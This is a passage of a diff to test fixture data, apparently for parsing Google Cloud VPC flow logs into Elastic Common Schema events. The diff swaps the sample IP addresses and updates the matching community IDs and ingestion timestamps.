"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.76361854Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.76361854Z\"}", "kind": "event", "start": "2019-06-14T03:40:07.968717244Z", "end": "2019-06-14T03:49:53.081386115Z", @@ -23042,9 +23042,9 @@ "as": { "number": 15169 }, - "address": "203.0.113.27", + "address": "67.43.156.13", "port": 34536, - "ip": "203.0.113.27" + "ip": "67.43.156.13" }, "source": { "address": "10.87.40.76", @@ -23058,7 +23058,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:+zMbnpjHTGFzARWUkJuGfy8ryQE=", + "community_id": "1:UvoHbtWzAMEin6FWcQYUnzv4vOQ=", "bytes": 1780, "transport": "tcp", "type": "ipv4", @@ -23073,7 +23073,7 @@ "related": { "ip": [ "10.87.40.76", - "203.0.113.27" + "67.43.156.13" ] }, "gcp": { @@ -23097,8 +23097,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.869251300Z", - "original": "{\"insertId\":\"1gq7q7afe373ek\",\"jsonPayload\":{\"bytes_sent\":\"1780\",\"connection\":{\"dest_ip\":\"203.0.113.27\",\"dest_port\":34536,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":5601},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"end_time\":\"2019-06-14T03:47:51.162931667Z\",\"packets_sent\":\"7\",\"reporter\":\"SRC\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:47:51.050074134Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.76361854Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.76361854Z\"}", + "ingested": "2021-12-09T13:37:46.392456800Z", + "original": "{\"insertId\":\"1gq7q7afe373ek\",\"jsonPayload\":{\"bytes_sent\":\"1780\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":34536,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":5601},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"end_time\":\"2019-06-14T03:47:51.162931667Z\",\"packets_sent\":\"7\",\"reporter\":\"SRC\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:47:51.050074134Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.76361854Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.76361854Z\"}", "kind": "event", "start": "2019-06-14T03:47:51.050074134Z", "end": "2019-06-14T03:47:51.162931667Z", @@ -23125,18 +23125,18 @@ "as": { "number": 15169 }, - "address": "198.51.100.248", + "address": "67.43.156.14", "port": 9200, "bytes": 137855, "domain": "elasticsearch", - "ip": "198.51.100.248", + "ip": "67.43.156.14", "packets": 72 }, "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:1JiVoUP9ZCGJx3vJg7cg+GheZ8o=", + "community_id": "1:9Sajzk9Kjby8Y6aALULEYfH3nYY=", "bytes": 137855, "name": "default", "transport": "tcp", @@ -23158,7 +23158,7 @@ }, "related": { "ip": [ - "198.51.100.248", + "67.43.156.14", "10.87.40.76" ] }, @@ -23195,8 +23195,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.869253900Z", - "original": "{\"insertId\":\"1gq7q7afe373fj\",\"jsonPayload\":{\"bytes_sent\":\"137855\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":33572,\"protocol\":6,\"src_ip\":\"198.51.100.248\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:51.821291282Z\",\"packets_sent\":\"72\",\"reporter\":\"DEST\",\"rtt_msec\":\"2\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:08.466742414Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.76361854Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.76361854Z\"}", + "ingested": "2021-12-09T13:37:46.392462700Z", + "original": "{\"insertId\":\"1gq7q7afe373fj\",\"jsonPayload\":{\"bytes_sent\":\"137855\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":33572,\"protocol\":6,\"src_ip\":\"67.43.156.14\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:51.821291282Z\",\"packets_sent\":\"72\",\"reporter\":\"DEST\",\"rtt_msec\":\"2\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:08.466742414Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.76361854Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.76361854Z\"}", "kind": "event", "start": "2019-06-14T03:40:08.466742414Z", "end": "2019-06-14T03:49:51.821291282Z", @@ -23223,18 +23223,18 @@ "as": { "number": 15169 }, - "address": "198.51.100.248", + "address": "67.43.156.14", "port": 9200, "bytes": 125197, "domain": "elasticsearch", - "ip": "198.51.100.248", + "ip": "67.43.156.14", "packets": 242 }, "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:VI3r5tULP+rnInZrp9gsYAw2kGA=", + "community_id": "1:LgPQaxqGyF5gYr06s0NCzKofgOo=", "bytes": 125197, "name": "default", "transport": "tcp", @@ -23256,7 +23256,7 @@ }, "related": { "ip": [ - "198.51.100.248", + "67.43.156.14", "10.87.40.76" ] }, @@ -23293,8 +23293,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.869256500Z", - "original": "{\"insertId\":\"1gq7q7afe373fm\",\"jsonPayload\":{\"bytes_sent\":\"125197\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":33540,\"protocol\":6,\"src_ip\":\"198.51.100.248\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:51.789258875Z\",\"packets_sent\":\"242\",\"reporter\":\"DEST\",\"rtt_msec\":\"2\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:39:59.500483335Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.76361854Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.76361854Z\"}", + "ingested": "2021-12-09T13:37:46.392468100Z", + "original": "{\"insertId\":\"1gq7q7afe373fm\",\"jsonPayload\":{\"bytes_sent\":\"125197\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":33540,\"protocol\":6,\"src_ip\":\"67.43.156.14\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:51.789258875Z\",\"packets_sent\":\"242\",\"reporter\":\"DEST\",\"rtt_msec\":\"2\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:39:59.500483335Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.76361854Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.76361854Z\"}", "kind": "event", "start": "2019-06-14T03:39:59.500483335Z", "end": "2019-06-14T03:49:51.789258875Z", @@ -23321,18 +23321,18 @@ "as": { "number": 15169 }, - "address": "198.51.100.88", + "address": "67.43.156.14", "port": 53096, "bytes": 917832, "domain": "zeek-nsm", - "ip": "198.51.100.88", + "ip": "67.43.156.14", "packets": 230 }, "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:P09xUQegPHVLOJDKriRG0pgrXhE=", + "community_id": "1:p9p1/vwvoKmWznvDynb8S94wSVM=", "bytes": 917832, "name": "default", "transport": "tcp", @@ -23354,7 +23354,7 @@ }, "related": { "ip": [ - "198.51.100.88", + "67.43.156.14", "10.139.99.242" ] }, @@ -23391,8 +23391,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.869259300Z", - "original": "{\"insertId\":\"1gq7q7afe373eg\",\"jsonPayload\":{\"bytes_sent\":\"917832\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"198.51.100.88\",\"src_port\":53096},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:56.219496168Z\",\"packets_sent\":\"230\",\"reporter\":\"DEST\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-central1\",\"vm_name\":\"zeek-nsm\",\"zone\":\"us-central1-a\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:01.853096315Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.76361854Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.76361854Z\"}", + "ingested": "2021-12-09T13:37:46.392473600Z", + "original": "{\"insertId\":\"1gq7q7afe373eg\",\"jsonPayload\":{\"bytes_sent\":\"917832\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"67.43.156.14\",\"src_port\":53096},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:56.219496168Z\",\"packets_sent\":\"230\",\"reporter\":\"DEST\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-central1\",\"vm_name\":\"zeek-nsm\",\"zone\":\"us-central1-a\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:01.853096315Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.76361854Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.76361854Z\"}", "kind": "event", "start": "2019-06-14T03:40:01.853096315Z", "end": "2019-06-14T03:49:56.219496168Z", @@ -23413,10 +23413,10 @@ "as": { "number": 15169 }, - "address": "198.51.100.88", + "address": "67.43.156.14", "port": 53096, "domain": "zeek-nsm", - "ip": "198.51.100.88" + "ip": "67.43.156.14" }, "source": { "address": "10.139.99.242", @@ -23430,7 +23430,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:P09xUQegPHVLOJDKriRG0pgrXhE=", + "community_id": "1:p9p1/vwvoKmWznvDynb8S94wSVM=", "bytes": 55572, "name": "default", "transport": "tcp", @@ -23453,7 +23453,7 @@ "related": { "ip": [ "10.139.99.242", - "198.51.100.88" + "67.43.156.14" ] }, "gcp": { @@ -23489,8 +23489,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.869261900Z", - "original": "{\"insertId\":\"1gq7q7afe373fc\",\"jsonPayload\":{\"bytes_sent\":\"55572\",\"connection\":{\"dest_ip\":\"198.51.100.88\",\"dest_port\":53096,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-central1\",\"vm_name\":\"zeek-nsm\",\"zone\":\"us-central1-a\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:56.219496168Z\",\"packets_sent\":\"133\",\"reporter\":\"SRC\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:01.853096315Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.76361854Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.76361854Z\"}", + "ingested": "2021-12-09T13:37:46.392479200Z", + "original": "{\"insertId\":\"1gq7q7afe373fc\",\"jsonPayload\":{\"bytes_sent\":\"55572\",\"connection\":{\"dest_ip\":\"67.43.156.14\",\"dest_port\":53096,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-central1\",\"vm_name\":\"zeek-nsm\",\"zone\":\"us-central1-a\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:56.219496168Z\",\"packets_sent\":\"133\",\"reporter\":\"SRC\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:01.853096315Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.76361854Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.76361854Z\"}", "kind": "event", "start": "2019-06-14T03:40:01.853096315Z", "end": "2019-06-14T03:49:56.219496168Z", @@ -23517,18 +23517,18 @@ "as": { "number": 15169 }, - "address": "203.0.113.134", + "address": "67.43.156.13", "port": 33966, "bytes": 4615, "domain": "kibana", - "ip": "203.0.113.134", + "ip": "67.43.156.13", "packets": 75 }, "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:JeEMpLpISUoKidiacbnV1gCPvyA=", + "community_id": "1:7RYpCdauzSw7iSF8Ox56BXoCZls=", "bytes": 4615, "name": "default", "transport": "tcp", @@ -23550,7 +23550,7 @@ }, "related": { "ip": [ - "203.0.113.134", + "67.43.156.13", "10.139.99.242" ] }, @@ -23587,8 +23587,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.869264600Z", - "original": "{\"insertId\":\"1gq7q7afe373eq\",\"jsonPayload\":{\"bytes_sent\":\"4615\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"203.0.113.134\",\"src_port\":33966},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:51.821049800Z\",\"packets_sent\":\"75\",\"reporter\":\"DEST\",\"rtt_msec\":\"0\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:20.510698570Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.76361854Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.76361854Z\"}", + "ingested": "2021-12-09T13:37:46.392484800Z", + "original": "{\"insertId\":\"1gq7q7afe373eq\",\"jsonPayload\":{\"bytes_sent\":\"4615\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":33966},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:51.821049800Z\",\"packets_sent\":\"75\",\"reporter\":\"DEST\",\"rtt_msec\":\"0\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:20.510698570Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.76361854Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.76361854Z\"}", "kind": "event", "start": "2019-06-14T03:40:20.510698570Z", "end": "2019-06-14T03:49:51.821049800Z", @@ -23611,9 +23611,9 @@ "as": { "number": 33652 }, - "address": "203.0.113.58", + "address": "67.43.156.13", "port": 65318, - "ip": "203.0.113.58" + "ip": "67.43.156.13" }, "source": { "address": "10.139.99.242", @@ -23627,7 +23627,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:GgfFDV/IDDGuMmQ9Zk+/ReCe5Rk=", + "community_id": "1:abTkiqsELuUBAWswX/nZozHWPVo=", "bytes": 75612, "transport": "tcp", "type": "ipv4", @@ -23642,7 +23642,7 @@ "related": { "ip": [ "10.139.99.242", - "203.0.113.58" + "67.43.156.13" ] }, "gcp": { @@ -23666,8 +23666,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.869267400Z", - "original": "{\"insertId\":\"1gq7q7afe373ev\",\"jsonPayload\":{\"bytes_sent\":\"75612\",\"connection\":{\"dest_ip\":\"203.0.113.58\",\"dest_port\":65318,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_location\":{\"asn\":33652,\"city\":\"Broomfield\",\"continent\":\"America\",\"country\":\"usa\",\"region\":\"Colorado\"},\"end_time\":\"2019-06-14T03:49:56.220599950Z\",\"packets_sent\":\"583\",\"reporter\":\"SRC\",\"rtt_msec\":\"96\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:00.760345858Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.76361854Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.76361854Z\"}", + "ingested": "2021-12-09T13:37:46.392490400Z", + "original": "{\"insertId\":\"1gq7q7afe373ev\",\"jsonPayload\":{\"bytes_sent\":\"75612\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":65318,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_location\":{\"asn\":33652,\"city\":\"Broomfield\",\"continent\":\"America\",\"country\":\"usa\",\"region\":\"Colorado\"},\"end_time\":\"2019-06-14T03:49:56.220599950Z\",\"packets_sent\":\"583\",\"reporter\":\"SRC\",\"rtt_msec\":\"96\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:00.760345858Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.76361854Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.76361854Z\"}", "kind": "event", "start": "2019-06-14T03:40:00.760345858Z", "end": "2019-06-14T03:49:56.220599950Z", @@ -23694,17 +23694,17 @@ "as": { "number": 15169 }, - "address": "203.0.113.27", + "address": "67.43.156.13", "port": 34536, "bytes": 1461, - "ip": "203.0.113.27", + "ip": "67.43.156.13", "packets": 7 }, "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:+zMbnpjHTGFzARWUkJuGfy8ryQE=", + "community_id": "1:UvoHbtWzAMEin6FWcQYUnzv4vOQ=", "bytes": 1461, "transport": "tcp", "type": "ipv4", @@ -23718,7 +23718,7 @@ }, "related": { "ip": [ - "203.0.113.27", + "67.43.156.13", "10.87.40.76" ] }, @@ -23743,8 +23743,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.869270100Z", - "original": "{\"insertId\":\"1gq7q7afe373em\",\"jsonPayload\":{\"bytes_sent\":\"1461\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":5601,\"protocol\":6,\"src_ip\":\"203.0.113.27\",\"src_port\":34536},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:47:51.162931667Z\",\"packets_sent\":\"7\",\"reporter\":\"DEST\",\"rtt_msec\":\"36\",\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"start_time\":\"2019-06-14T03:47:51.050074134Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.76361854Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.76361854Z\"}", + "ingested": "2021-12-09T13:37:46.392495900Z", + "original": "{\"insertId\":\"1gq7q7afe373em\",\"jsonPayload\":{\"bytes_sent\":\"1461\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":5601,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":34536},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:47:51.162931667Z\",\"packets_sent\":\"7\",\"reporter\":\"DEST\",\"rtt_msec\":\"36\",\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"start_time\":\"2019-06-14T03:47:51.050074134Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.76361854Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.76361854Z\"}", "kind": "event", "start": "2019-06-14T03:47:51.050074134Z", "end": "2019-06-14T03:47:51.162931667Z", @@ -23765,9 +23765,9 @@ "as": { "number": 15169 }, - 